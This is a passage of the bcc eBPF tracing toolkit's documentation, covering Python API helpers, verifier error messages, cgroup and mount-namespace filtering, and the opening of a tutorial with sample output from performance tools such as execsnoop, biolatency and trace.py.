<pre><code class="language-Python">print("kernel address: %x" % b.ksymname("vfs_read"))
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=ksymname+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=ksymname+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="3-sym"><a class="header" href="#3-sym">3. sym()</a></h3>
|
||
<p>Syntax: <code>BPF.sym(addr, pid, show_module=False, show_offset=False)</code></p>
|
||
<p>Translate a memory address into a function name for a pid, which is returned. A pid of less than zero will access the kernel symbol cache. The <code>show_module</code> and <code>show_offset</code> parameters control whether the module in which the symbol lies should be displayed, and whether the instruction offset from the beginning of the symbol should be displayed. These extra parameters default to <code>False</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-python">print("function: " + b.sym(addr, pid))
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=sym+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=sym+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="4-num_open_kprobes"><a class="header" href="#4-num_open_kprobes">4. num_open_kprobes()</a></h3>
|
||
<p>Syntax: <code>BPF.num_open_kprobes()</code></p>
|
||
<p>Returns the number of open k[ret]probes. Can be useful for scenarios where event_re is used while attaching and detaching probes. Excludes perf_events readers.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-python">b.attach_kprobe(event_re=pattern, fn_name="trace_count")
|
||
matched = b.num_open_kprobes()
|
||
if matched == 0:
|
||
print("0 functions matched by \"%s\". Exiting." % args.pattern)
|
||
exit()
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=num_open_kprobes+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=num_open_kprobes+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="5-get_syscall_fnname"><a class="header" href="#5-get_syscall_fnname">5. get_syscall_fnname()</a></h3>
|
||
<p>Syntax: <code>BPF.get_syscall_fnname(name : str)</code></p>
|
||
<p>Return the corresponding kernel function name of the syscall. This helper function will try different prefixes and use the right one to concatenate with the syscall name. Note that the return value may vary in different versions of linux kernel and sometimes it will causing trouble. (see <a href="https://github.com/iovisor/bcc/issues/2590">#2590</a>)</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-python">print("The function name of %s in kernel is %s" % ("clone", b.get_syscall_fnname("clone")))
|
||
# sys_clone or __x64_sys_clone or ...
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=get_syscall_fnname+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=get_syscall_fnname+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h1 id="bpf-errors"><a class="header" href="#bpf-errors">BPF Errors</a></h1>
|
||
<p>See the "Understanding eBPF verifier messages" section in the kernel source under Documentation/networking/filter.txt.</p>
|
||
<h2 id="1-invalid-mem-access"><a class="header" href="#1-invalid-mem-access">1. Invalid mem access</a></h2>
|
||
<p>This can be due to trying to read memory directly, instead of operating on memory on the BPF stack. All kernel memory reads must be passed via bpf_probe_read_kernel() to copy kernel memory into the BPF stack, which can be automatic by the bcc rewriter in some cases of simple dereferencing. bpf_probe_read_kernel() does all the required checks.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-sh">bpf: Permission denied
|
||
0: (bf) r6 = r1
|
||
1: (79) r7 = *(u64 *)(r6 +80)
|
||
2: (85) call 14
|
||
3: (bf) r8 = r0
|
||
[...]
|
||
23: (69) r1 = *(u16 *)(r7 +16)
|
||
R7 invalid mem access 'inv'
|
||
|
||
Traceback (most recent call last):
|
||
File "./tcpaccept", line 179, in <module>
|
||
b = BPF(text=bpf_text)
|
||
File "/usr/lib/python2.7/dist-packages/bcc/__init__.py", line 172, in __init__
|
||
self._trace_autoload()
|
||
File "/usr/lib/python2.7/dist-packages/bcc/__init__.py", line 612, in _trace_autoload
|
||
fn = self.load_func(func_name, BPF.KPROBE)
|
||
File "/usr/lib/python2.7/dist-packages/bcc/__init__.py", line 212, in load_func
|
||
raise Exception("Failed to load BPF program %s" % func_name)
|
||
Exception: Failed to load BPF program kretprobe__inet_csk_accept
|
||
</code></pre>
|
||
<h2 id="2-cannot-call-gpl-only-function-from-proprietary-program"><a class="header" href="#2-cannot-call-gpl-only-function-from-proprietary-program">2. Cannot call GPL only function from proprietary program</a></h2>
|
||
<p>This error happens when a GPL-only helper is called from a non-GPL BPF program. To fix this error, do not use GPL-only helpers from a proprietary BPF program, or relicense the BPF program under a GPL-compatible license. Check which <a href="https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md#helpers">BPF helpers</a> are GPL-only, and what licenses are considered GPL-compatible.</p>
|
||
<p>Example calling <code>bpf_get_stackid()</code>, a GPL-only BPF helper, from a proprietary program (<code>#define BPF_LICENSE Proprietary</code>):</p>
|
||
<pre><code class="language-sh">bpf: Failed to load program: Invalid argument
|
||
[...]
|
||
8: (85) call bpf_get_stackid#27
|
||
cannot call GPL only function from proprietary program
|
||
</code></pre>
|
||
<h1 id="environment-variables"><a class="header" href="#environment-variables">Environment Variables</a></h1>
|
||
<h2 id="1-kernel-source-directory"><a class="header" href="#1-kernel-source-directory">1. Kernel source directory</a></h2>
|
||
<p>eBPF program compilation needs kernel sources or kernel headers with headers
|
||
compiled. In case your kernel sources are at a non-standard location where BCC
|
||
cannot find then, its possible to provide BCC the absolute path of the location
|
||
by setting <code>BCC_KERNEL_SOURCE</code> to it.</p>
|
||
<h2 id="2-kernel-version-overriding"><a class="header" href="#2-kernel-version-overriding">2. Kernel version overriding</a></h2>
|
||
<p>By default, BCC stores the <code>LINUX_VERSION_CODE</code> in the generated eBPF object
|
||
which is then passed along to the kernel when the eBPF program is loaded.
|
||
Sometimes this is quite inconvenient especially when the kernel is slightly
|
||
updated such as an LTS kernel release. Its extremely unlikely the slight
|
||
mismatch would cause any issues with the loaded eBPF program. By setting
|
||
<code>BCC_LINUX_VERSION_CODE</code> to the version of the kernel that's running, the check
|
||
for verifying the kernel version can be bypassed. This is needed for programs
|
||
that use kprobes. This needs to be encoded in the format: <code>(VERSION * 65536) + (PATCHLEVEL * 256) + SUBLEVEL</code>. For example, if the running kernel is <code>4.9.10</code>,
|
||
then can set <code>export BCC_LINUX_VERSION_CODE=264458</code> to override the kernel
|
||
version check successfully.</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="special-filtering"><a class="header" href="#special-filtering">Special Filtering</a></h1>
|
||
<p>Some tools have special filtering capabitilies, the main use case is to trace
|
||
processes running in containers, but those mechanisms are generic and could
|
||
be used in other cases as well.</p>
|
||
<h2 id="filtering-by-cgroups"><a class="header" href="#filtering-by-cgroups">Filtering by cgroups</a></h2>
|
||
<p>Some tools have an option to filter by cgroup by referencing a pinned BPF hash
|
||
map managed externally.</p>
|
||
<p>Examples of commands:</p>
|
||
<pre><code class="language-sh"># ./opensnoop --cgroupmap /sys/fs/bpf/test01
|
||
# ./execsnoop --cgroupmap /sys/fs/bpf/test01
|
||
# ./tcpconnect --cgroupmap /sys/fs/bpf/test01
|
||
# ./tcpaccept --cgroupmap /sys/fs/bpf/test01
|
||
# ./tcptracer --cgroupmap /sys/fs/bpf/test01
|
||
</code></pre>
|
||
<p>The commands above will only display results from processes that belong to one
|
||
of the cgroups whose id, returned by <code>bpf_get_current_cgroup_id()</code>, is in the
|
||
pinned BPF hash map.</p>
|
||
<p>The BPF hash map can be created by:</p>
|
||
<pre><code class="language-sh"># bpftool map create /sys/fs/bpf/test01 type hash key 8 value 8 entries 128 \
|
||
name cgroupset flags 0
|
||
</code></pre>
|
||
<p>To get a shell in a new cgroup, you can use:</p>
|
||
<pre><code class="language-sh"># systemd-run --pty --unit test bash
|
||
</code></pre>
|
||
<p>The shell will be running in the cgroup
|
||
<code>/sys/fs/cgroup/unified/system.slice/test.service</code>.</p>
|
||
<p>The cgroup id can be discovered using the <code>name_to_handle_at()</code> system call. In
|
||
the examples/cgroupid, you will find an example of program to get the cgroup
|
||
id.</p>
|
||
<pre><code class="language-sh"># cd examples/cgroupid
|
||
# make
|
||
# ./cgroupid hex /sys/fs/cgroup/unified/system.slice/test.service
|
||
</code></pre>
|
||
<p>or, using Docker:</p>
|
||
<pre><code class="language-sh"># cd examples/cgroupid
|
||
# docker build -t cgroupid .
|
||
# docker run --rm --privileged -v /sys/fs/cgroup:/sys/fs/cgroup \
|
||
cgroupid cgroupid hex /sys/fs/cgroup/unified/system.slice/test.service
|
||
</code></pre>
|
||
<p>This prints the cgroup id as a hexadecimal string in the host endianness such
|
||
as <code>77 16 00 00 01 00 00 00</code>.</p>
|
||
<pre><code class="language-sh"># FILE=/sys/fs/bpf/test01
|
||
# CGROUPID_HEX="77 16 00 00 01 00 00 00"
|
||
# bpftool map update pinned $FILE key hex $CGROUPID_HEX value hex 00 00 00 00 00 00 00 00 any
|
||
</code></pre>
|
||
<p>Now that the shell started by systemd-run has its cgroup id in the BPF hash
|
||
map, bcc tools will display results from this shell. Cgroups can be added and
|
||
removed from the BPF hash map without restarting the bcc tool.</p>
|
||
<p>This feature is useful for integrating bcc tools in external projects.</p>
|
||
<h2 id="filtering-by-mount-by-namespace"><a class="header" href="#filtering-by-mount-by-namespace">Filtering by mount by namespace</a></h2>
|
||
<p>The BPF hash map can be created by:</p>
|
||
<pre><code class="language-sh"># bpftool map create /sys/fs/bpf/mnt_ns_set type hash key 8 value 4 entries 128 \
|
||
name mnt_ns_set flags 0
|
||
</code></pre>
|
||
<p>Execute the <code>execsnoop</code> tool filtering only the mount namespaces
|
||
in <code>/sys/fs/bpf/mnt_ns_set</code>:</p>
|
||
<pre><code class="language-sh"># tools/execsnoop.py --mntnsmap /sys/fs/bpf/mnt_ns_set
|
||
</code></pre>
|
||
<p>Start a terminal in a new mount namespace:</p>
|
||
<pre><code class="language-sh"># unshare -m bash
|
||
</code></pre>
|
||
<p>Update the hash map with the mount namespace ID of the terminal above:</p>
|
||
<pre><code class="language-sh">FILE=/sys/fs/bpf/mnt_ns_set
|
||
if [ $(printf '\1' | od -dAn) -eq 1 ]; then
|
||
HOST_ENDIAN_CMD=tac
|
||
else
|
||
HOST_ENDIAN_CMD=cat
|
||
fi
|
||
|
||
NS_ID_HEX="$(printf '%016x' $(stat -Lc '%i' /proc/self/ns/mnt) | sed 's/.\{2\}/&\n/g' | $HOST_ENDIAN_CMD)"
|
||
bpftool map update pinned $FILE key hex $NS_ID_HEX value hex 00 00 00 00 any
|
||
</code></pre>
|
||
<p>Execute a command in this terminal:</p>
|
||
<pre><code class="language-sh"># ping kinvolk.io
|
||
</code></pre>
|
||
<p>You'll see how on the <code>execsnoop</code> terminal you started above the call is logged:</p>
|
||
<pre><code class="language-sh"># tools/execsnoop.py --mntnsmap /sys/fs/bpf/mnt_ns_set
|
||
[sudo] password for mvb:
|
||
PCOMM PID PPID RET ARGS
|
||
ping 8096 7970 0 /bin/ping kinvolk.io
|
||
</code></pre>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="bcc-tutorial"><a class="header" href="#bcc-tutorial">bcc Tutorial</a></h1>
|
||
<p>This tutorial covers how to use <a href="https://github.com/iovisor/bcc">bcc</a> tools to quickly solve performance, troubleshooting, and networking issues. If you want to develop new bcc tools, see <a href="bcc-documents/tutorial_bcc_python_developer.html">tutorial_bcc_python_developer.md</a> for that tutorial.</p>
|
||
<p>It is assumed for this tutorial that bcc is already installed, and you can run tools like execsnoop successfully. See <a href="https://github.com/iovisor/bcc/tree/master/INSTALL.md">INSTALL.md</a>. This uses enhancements added to the Linux 4.x series.</p>
|
||
<h2 id="observability"><a class="header" href="#observability">Observability</a></h2>
|
||
<p>Some quick wins.</p>
|
||
<h3 id="0-before-bcc"><a class="header" href="#0-before-bcc">0. Before bcc</a></h3>
|
||
<p>Before using bcc, you should start with the Linux basics. One reference is the <a href="https://netflixtechblog.com/linux-performance-analysis-in-60-000-milliseconds-accc10403c55">Linux Performance Analysis in 60,000 Milliseconds</a> post, which covers these commands:</p>
|
||
<ol>
|
||
<li>uptime</li>
|
||
<li>dmesg | tail</li>
|
||
<li>vmstat 1</li>
|
||
<li>mpstat -P ALL 1</li>
|
||
<li>pidstat 1</li>
|
||
<li>iostat -xz 1</li>
|
||
<li>free -m</li>
|
||
<li>sar -n DEV 1</li>
|
||
<li>sar -n TCP,ETCP 1</li>
|
||
<li>top</li>
|
||
</ol>
|
||
<h3 id="1-general-performance"><a class="header" href="#1-general-performance">1. General Performance</a></h3>
|
||
<p>Here is a generic checklist for performance investigations with bcc, first as a list, then in detail:</p>
|
||
<ol>
|
||
<li>execsnoop</li>
|
||
<li>opensnoop</li>
|
||
<li>ext4slower (or btrfs*, xfs*, zfs*)</li>
|
||
<li>biolatency</li>
|
||
<li>biosnoop</li>
|
||
<li>cachestat</li>
|
||
<li>tcpconnect</li>
|
||
<li>tcpaccept</li>
|
||
<li>tcpretrans</li>
|
||
<li>runqlat</li>
|
||
<li>profile</li>
|
||
</ol>
|
||
<p>These tools may be installed on your system under /usr/share/bcc/tools, or you can run them from the bcc github repo under /tools where they have a .py extension. Browse the 50+ tools available for more analysis options.</p>
|
||
<h4 id="11-execsnoop"><a class="header" href="#11-execsnoop">1.1 execsnoop</a></h4>
|
||
<pre><code class="language-sh"># ./execsnoop
|
||
PCOMM PID RET ARGS
|
||
supervise 9660 0 ./run
|
||
supervise 9661 0 ./run
|
||
mkdir 9662 0 /bin/mkdir -p ./main
|
||
run 9663 0 ./run
|
||
[...]
|
||
</code></pre>
|
||
<p>execsnoop prints one line of output for each new process. Check for short-lived processes. These can consume CPU resources, but not show up in most monitoring tools that periodically take snapshots of which processes are running.</p>
|
||
<p>It works by tracing exec(), not the fork(), so it will catch many types of new processes but not all (eg, it won't see an application launching working processes, that doesn't exec() anything else).</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/execsnoop_example.txt">examples</a>.</p>
|
||
<h4 id="12-opensnoop"><a class="header" href="#12-opensnoop">1.2. opensnoop</a></h4>
|
||
<pre><code class="language-sh"># ./opensnoop
|
||
PID COMM FD ERR PATH
|
||
1565 redis-server 5 0 /proc/1565/stat
|
||
1565 redis-server 5 0 /proc/1565/stat
|
||
1565 redis-server 5 0 /proc/1565/stat
|
||
1603 snmpd 9 0 /proc/net/dev
|
||
1603 snmpd 11 0 /proc/net/if_inet6
|
||
1603 snmpd -1 2 /sys/class/net/eth0/device/vendor
|
||
1603 snmpd 11 0 /proc/sys/net/ipv4/neigh/eth0/retrans_time_ms
|
||
1603 snmpd 11 0 /proc/sys/net/ipv6/neigh/eth0/retrans_time_ms
|
||
1603 snmpd 11 0 /proc/sys/net/ipv6/conf/eth0/forwarding
|
||
[...]
|
||
</code></pre>
|
||
<p>opensnoop prints one line of output for each open() syscall, including details.</p>
|
||
<p>Files that are opened can tell you a lot about how applications work: identifying their data files, config files, and log files. Sometimes applications can misbehave, and perform poorly, when they are constantly attempting to read files that do not exist. opensnoop gives you a quick look.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/opensnoop_example.txt">examples</a>.</p>
|
||
<h4 id="13-ext4slower-or-btrfs-xfs-zfs"><a class="header" href="#13-ext4slower-or-btrfs-xfs-zfs">1.3. ext4slower (or btrfs*, xfs*, zfs*)</a></h4>
|
||
<pre><code class="language-sh"># ./ext4slower
|
||
Tracing ext4 operations slower than 10 ms
|
||
TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME
|
||
06:35:01 cron 16464 R 1249 0 16.05 common-auth
|
||
06:35:01 cron 16463 R 1249 0 16.04 common-auth
|
||
06:35:01 cron 16465 R 1249 0 16.03 common-auth
|
||
06:35:01 cron 16465 R 4096 0 10.62 login.defs
|
||
06:35:01 cron 16464 R 4096 0 10.61 login.defs
|
||
</code></pre>
|
||
<p>ext4slower traces the ext4 file system and times common operations, and then only prints those that exceed a threshold.</p>
|
||
<p>This is great for identifying or exonerating one type of performance issue: show individually slow disk i/O via the file system. Disks process I/O asynchronously, and it can be difficult to associate latency at that layer with the latency applications experience. Tracing higher up in the kernel stack, at the VFS -> file system interface, will more closely match what an application suffers. Use this tool to identify if file system latency exceeds a given threshold.</p>
|
||
<p>Similar tools exist in bcc for other file systems: btrfsslower, xfsslower, and zfsslower. There is also fileslower, which works at the VFS layer and traces everything (although at some higher overhead).</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/ext4slower_example.txt">examples</a>.</p>
|
||
<h4 id="14-biolatency"><a class="header" href="#14-biolatency">1.4. biolatency</a></h4>
|
||
<pre><code class="language-sh"># ./biolatency
|
||
Tracing block device I/O... Hit Ctrl-C to end.
|
||
^C
|
||
usecs : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 0 | |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 1 | |
|
||
128 -> 255 : 12 |******** |
|
||
256 -> 511 : 15 |********** |
|
||
512 -> 1023 : 43 |******************************* |
|
||
1024 -> 2047 : 52 |**************************************|
|
||
2048 -> 4095 : 47 |********************************** |
|
||
4096 -> 8191 : 52 |**************************************|
|
||
8192 -> 16383 : 36 |************************** |
|
||
16384 -> 32767 : 15 |********** |
|
||
32768 -> 65535 : 2 |* |
|
||
65536 -> 131071 : 2 |* |
|
||
</code></pre>
|
||
<p>biolatency traces disk I/O latency (time from device issue to completion), and when the tool ends (Ctrl-C, or a given interval), it prints a histogram summary of the latency.</p>
|
||
<p>This is great for understanding disk I/O latency beyond the average times given by tools like iostat. I/O latency outliers will be visible at the end of the distribution, as well as multi-mode distributions.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/biolatency_example.txt">examples</a>.</p>
|
||
<h4 id="15-biosnoop"><a class="header" href="#15-biosnoop">1.5. biosnoop</a></h4>
|
||
<pre><code class="language-sh"># ./biosnoop
|
||
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
|
||
0.000004001 supervise 1950 xvda1 W 13092560 4096 0.74
|
||
0.000178002 supervise 1950 xvda1 W 13092432 4096 0.61
|
||
0.001469001 supervise 1956 xvda1 W 13092440 4096 1.24
|
||
0.001588002 supervise 1956 xvda1 W 13115128 4096 1.09
|
||
1.022346001 supervise 1950 xvda1 W 13115272 4096 0.98
|
||
1.022568002 supervise 1950 xvda1 W 13188496 4096 0.93
|
||
[...]
|
||
</code></pre>
|
||
<p>biosnoop prints a line of output for each disk I/O, with details including latency (time from device issue to completion).</p>
|
||
<p>This allows you to examine disk I/O in more detail, and look for time-ordered patterns (eg, reads queueing behind writes). Note that the output will be verbose if your system performs disk I/O at a high rate.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/biosnoop_example.txt">examples</a>.</p>
|
||
<h4 id="16-cachestat"><a class="header" href="#16-cachestat">1.6. cachestat</a></h4>
|
||
<pre><code class="language-sh"># ./cachestat
|
||
HITS MISSES DIRTIES READ_HIT% WRITE_HIT% BUFFERS_MB CACHED_MB
|
||
1074 44 13 94.9% 2.9% 1 223
|
||
2195 170 8 92.5% 6.8% 1 143
|
||
182 53 56 53.6% 1.3% 1 143
|
||
62480 40960 20480 40.6% 19.8% 1 223
|
||
7 2 5 22.2% 22.2% 1 223
|
||
348 0 0 100.0% 0.0% 1 223
|
||
[...]
|
||
</code></pre>
|
||
<p>cachestat prints a one line summary every second (or every custom interval) showing statistics from the file system cache.</p>
|
||
<p>Use this to identify a low cache hit ratio, and a high rate of misses: which gives one lead for performance tuning.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/cachestat_example.txt">examples</a>.</p>
|
||
<h4 id="17-tcpconnect"><a class="header" href="#17-tcpconnect">1.7. tcpconnect</a></h4>
|
||
<pre><code class="language-sh"># ./tcpconnect
|
||
PID COMM IP SADDR DADDR DPORT
|
||
1479 telnet 4 127.0.0.1 127.0.0.1 23
|
||
1469 curl 4 10.201.219.236 54.245.105.25 80
|
||
1469 curl 4 10.201.219.236 54.67.101.145 80
|
||
1991 telnet 6 ::1 ::1 23
|
||
2015 ssh 6 fe80::2000:bff:fe82:3ac fe80::2000:bff:fe82:3ac 22
|
||
[...]
|
||
</code></pre>
|
||
<p>tcpconnect prints one line of output for every active TCP connection (eg, via connect()), with details including source and destination addresses.</p>
|
||
<p>Look for unexpected connections that may point to inefficiencies in application configuration, or an intruder.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/tcpconnect_example.txt">examples</a>.</p>
|
||
<h4 id="18-tcpaccept"><a class="header" href="#18-tcpaccept">1.8. tcpaccept</a></h4>
|
||
<pre><code class="language-sh"># ./tcpaccept
|
||
PID COMM IP RADDR LADDR LPORT
|
||
907 sshd 4 192.168.56.1 192.168.56.102 22
|
||
907 sshd 4 127.0.0.1 127.0.0.1 22
|
||
5389 perl 6 1234:ab12:2040:5020:2299:0:5:0 1234:ab12:2040:5020:2299:0:5:0 7001
|
||
[...]
|
||
</code></pre>
|
||
<p>tcpaccept prints one line of output for every passive TCP connection (eg, via accept()), with details including source and destination addresses.</p>
|
||
<p>Look for unexpected connections that may point to inefficiencies in application configuration, or an intruder.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/tcpaccept_example.txt">examples</a>.</p>
|
||
<h4 id="19-tcpretrans"><a class="header" href="#19-tcpretrans">1.9. tcpretrans</a></h4>
|
||
<pre><code class="language-sh"># ./tcpretrans
|
||
TIME PID IP LADDR:LPORT T> RADDR:RPORT STATE
|
||
01:55:05 0 4 10.153.223.157:22 R> 69.53.245.40:34619 ESTABLISHED
|
||
01:55:05 0 4 10.153.223.157:22 R> 69.53.245.40:34619 ESTABLISHED
|
||
01:55:17 0 4 10.153.223.157:22 R> 69.53.245.40:22957 ESTABLISHED
|
||
[...]
|
||
</code></pre>
|
||
<p>tcprerans prints one line of output for every TCP retransmit packet, with details including source and destination addresses, and kernel state of the TCP connection.</p>
|
||
<p>TCP retransmissions cause latency and throughput issues. For ESTABLISHED retransmits, look for patterns with networks. For SYN_SENT, this may point to target kernel CPU saturation and kernel packet drops.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/tcpretrans_example.txt">examples</a>.</p>
|
||
<h4 id="110-runqlat"><a class="header" href="#110-runqlat">1.10. runqlat</a></h4>
|
||
<pre><code class="language-sh"># ./runqlat
|
||
Tracing run queue latency... Hit Ctrl-C to end.
|
||
^C
|
||
usecs : count distribution
|
||
0 -> 1 : 233 |*********** |
|
||
2 -> 3 : 742 |************************************ |
|
||
4 -> 7 : 203 |********** |
|
||
8 -> 15 : 173 |******** |
|
||
16 -> 31 : 24 |* |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 30 |* |
|
||
128 -> 255 : 6 | |
|
||
256 -> 511 : 3 | |
|
||
512 -> 1023 : 5 | |
|
||
1024 -> 2047 : 27 |* |
|
||
2048 -> 4095 : 30 |* |
|
||
4096 -> 8191 : 20 | |
|
||
8192 -> 16383 : 29 |* |
|
||
16384 -> 32767 : 809 |****************************************|
|
||
32768 -> 65535 : 64 |*** |
|
||
</code></pre>
|
||
<p>runqlat times how long threads were waiting on the CPU run queues, and prints this as a histogram.</p>
|
||
<p>This can help quantify time lost waiting for a turn on CPU, during periods of CPU saturation.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/runqlat_example.txt">examples</a>.</p>
|
||
<h4 id="111-profile"><a class="header" href="#111-profile">1.11. profile</a></h4>
|
||
<pre><code class="language-sh"># ./profile
|
||
Sampling at 49 Hertz of all threads by user + kernel stack... Hit Ctrl-C to end.
|
||
^C
|
||
00007f31d76c3251 [unknown]
|
||
47a2c1e752bf47f7 [unknown]
|
||
- sign-file (8877)
|
||
1
|
||
|
||
ffffffff813d0af8 __clear_user
|
||
ffffffff813d5277 iov_iter_zero
|
||
ffffffff814ec5f2 read_iter_zero
|
||
ffffffff8120be9d __vfs_read
|
||
ffffffff8120c385 vfs_read
|
||
ffffffff8120d786 sys_read
|
||
ffffffff817cc076 entry_SYSCALL_64_fastpath
|
||
00007fc5652ad9b0 read
|
||
- dd (25036)
|
||
4
|
||
|
||
0000000000400542 func_a
|
||
0000000000400598 main
|
||
00007f12a133e830 __libc_start_main
|
||
083e258d4c544155 [unknown]
|
||
- func_ab (13549)
|
||
5
|
||
|
||
[...]
|
||
|
||
ffffffff8105eb66 native_safe_halt
|
||
ffffffff8103659e default_idle
|
||
ffffffff81036d1f arch_cpu_idle
|
||
ffffffff810bba5a default_idle_call
|
||
ffffffff810bbd07 cpu_startup_entry
|
||
ffffffff8104df55 start_secondary
|
||
- swapper/1 (0)
|
||
75
|
||
</code></pre>
|
||
<p>profile is a CPU profiler, which takes samples of stack traces at timed intervals, and prints a summary of unique stack traces and a count of their occurrence.</p>
|
||
<p>Use this tool to understand the code paths that are consuming CPU resources.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/profile_example.txt">examples</a>.</p>
|
||
<h3 id="2-observability-with-generic-tools"><a class="header" href="#2-observability-with-generic-tools">2. Observability with Generic Tools</a></h3>
|
||
<p>In addition to the above tools for performance tuning, below is a checklist for bcc generic tools, first as a list, and in detail:</p>
|
||
<ol>
|
||
<li>trace</li>
|
||
<li>argdist</li>
|
||
<li>funccount</li>
|
||
</ol>
|
||
<p>These generic tools may be useful to provide visibility to solve your specific problems.</p>
|
||
<h4 id="21-trace"><a class="header" href="#21-trace">2.1. trace</a></h4>
|
||
<h5 id="example-1"><a class="header" href="#example-1">Example 1</a></h5>
|
||
<p>Suppose you want to track file ownership change. There are three syscalls, <code>chown</code>, <code>fchown</code> and <code>lchown</code> which users can use to change file ownership. The corresponding syscall entry is <code>SyS_[f|l]chown</code>. The following command can be used to print out syscall parameters and the calling process user id. You can use <code>id</code> command to find the uid of a particular user.</p>
|
||
<pre><code class="language-sh">$ trace.py \
|
||
'p::SyS_chown "file = %s, to_uid = %d, to_gid = %d, from_uid = %d", arg1, arg2, arg3, $uid' \
|
||
'p::SyS_fchown "fd = %d, to_uid = %d, to_gid = %d, from_uid = %d", arg1, arg2, arg3, $uid' \
|
||
'p::SyS_lchown "file = %s, to_uid = %d, to_gid = %d, from_uid = %d", arg1, arg2, arg3, $uid'
|
||
PID TID COMM FUNC -
|
||
1269255 1269255 python3.6 SyS_lchown file = /tmp/dotsync-usisgezu/tmp, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
1269441 1269441 zstd SyS_chown file = /tmp/dotsync-vic7ygj0/dotsync-package.zst, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
1269255 1269255 python3.6 SyS_lchown file = /tmp/dotsync-a40zd7ev/tmp, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
1269442 1269442 zstd SyS_chown file = /tmp/dotsync-gzp413o_/dotsync-package.zst, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
1269255 1269255 python3.6 SyS_lchown file = /tmp/dotsync-whx4fivm/tmp/.bash_profile, to_uid = 128203, to_gid = 100, from_uid = 128203
|
||
</code></pre>
|
||
<h5 id="example-2"><a class="header" href="#example-2">Example 2</a></h5>
|
||
<p>Suppose you want to count nonvoluntary context switches (<code>nvcsw</code>) in your bpf based performance monitoring tools and you do not know what is the proper method. <code>/proc/<pid>/status</code> already tells you the number (<code>nonvoluntary_ctxt_switches</code>) for a pid and you can use <code>trace.py</code> to do a quick experiment to verify your method. With kernel source code, the <code>nvcsw</code> is counted at file <code>linux/kernel/sched/core.c</code> function <code>__schedule</code> and under condition</p>
|
||
<pre><code class="language-c">!(!preempt && prev->state) // i.e., preempt || !prev->state
|
||
</code></pre>
|
||
<p>The <code>__schedule</code> function is marked as <code>notrace</code>, and the best place to evaluate the above condition seems in <code>sched/sched_switch</code> tracepoint called inside function <code>__schedule</code> and defined in <code>linux/include/trace/events/sched.h</code>. <code>trace.py</code> already has <code>args</code> being the pointer to the tracepoint <code>TP_STRUCT__entry</code>. The above condition in function <code>__schedule</code> can be represented as</p>
|
||
<pre><code class="language-c">args->prev_state == TASK_STATE_MAX || args->prev_state == 0
|
||
</code></pre>
|
||
<p>The below command can be used to count the involuntary context switches (per process or per pid) and compare to <code>/proc/<pid>/status</code> or <code>/proc/<pid>/task/<task_id>/status</code> for correctness, as in typical cases, involuntary context switches are not very common.</p>
|
||
<pre><code class="language-sh">$ trace.py -p 1134138 't:sched:sched_switch (args->prev_state == TASK_STATE_MAX || args->prev_state == 0)'
|
||
PID TID COMM FUNC
|
||
1134138 1134140 contention_test sched_switch
|
||
1134138 1134142 contention_test sched_switch
|
||
...
|
||
$ trace.py -L 1134140 't:sched:sched_switch (args->prev_state == TASK_STATE_MAX || args->prev_state == 0)'
|
||
PID TID COMM FUNC
|
||
1134138 1134140 contention_test sched_switch
|
||
1134138 1134140 contention_test sched_switch
|
||
...
|
||
</code></pre>
|
||
<h5 id="example-3"><a class="header" href="#example-3">Example 3</a></h5>
|
||
<p>This example is related to issue <a href="https://github.com/iovisor/bcc/issues/1231">1231</a> and <a href="https://github.com/iovisor/bcc/issues/1516">1516</a> where uprobe does not work at all in certain cases. First, you can do a <code>strace</code> as below</p>
|
||
<pre><code class="language-sh">$ strace trace.py 'r:bash:readline "%s", retval'
|
||
...
|
||
